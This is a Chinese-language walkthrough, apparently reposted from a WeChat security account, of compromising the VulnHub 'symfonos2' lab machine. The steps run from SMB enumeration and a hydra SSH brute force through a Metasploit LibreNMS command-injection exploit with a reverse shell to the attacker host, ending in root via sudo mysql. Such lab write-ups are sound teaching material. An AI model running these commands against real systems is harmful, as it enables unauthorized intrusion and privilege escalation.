本周实践的是vulnhub的symfonos2镜像,
下载地址,https://download.vulnhub.com/symfonos/symfonos2.7z,
用workstation导入成功,
console上直接能看到靶机的ip地址,192.168.88.137,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.88.137,
发现靶机开了22端口的ssh服务、139/445端口的smb服务,
对smb服务进行扫描,enum4linux 192.168.88.137,
获取到用户aeolus,
进行ssh暴破,hydra -l aeolus -P /usr/share/wordlists/rockyou.txt 192.168.88.137 ssh,获取到密码sergioteamo,
上msfconsole,
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.88.137
set username aeolus
set password sergioteamo
exploit
转成meterpreter的shell,sessions -u 1,
进入meterpreter的shell,sessions 2,
查看靶机开放端口,netstat,获取到127.0.0.1:8080,
为本地kali攻击机做个端口转发,
portfwd add -l 1234 -p 8080 -r 127.0.0.1,
浏览器访问http://localhost:1234,获取到LibreNMS服务,
将meterpreter的shell退到后台,background,
查找到可利用的漏洞和方法,search LibreNMS,
use exploit/linux/http/librenms_addhost_cmd_inject
set rhosts 127.0.0.1
set rport 1234
set lhost 192.168.88.131
set username aeolus
set password sergioteamo
exploit
拿到新的shell,转成可交互的shell,
python -c 'import pty; pty.spawn("/bin/sh")',
sudo -l发现 /usr/bin/mysql有root权限,
去GTFOBins搜提权方法,
提权,sudo mysql -e '! /bin/sh',获取到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之symfonos2的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论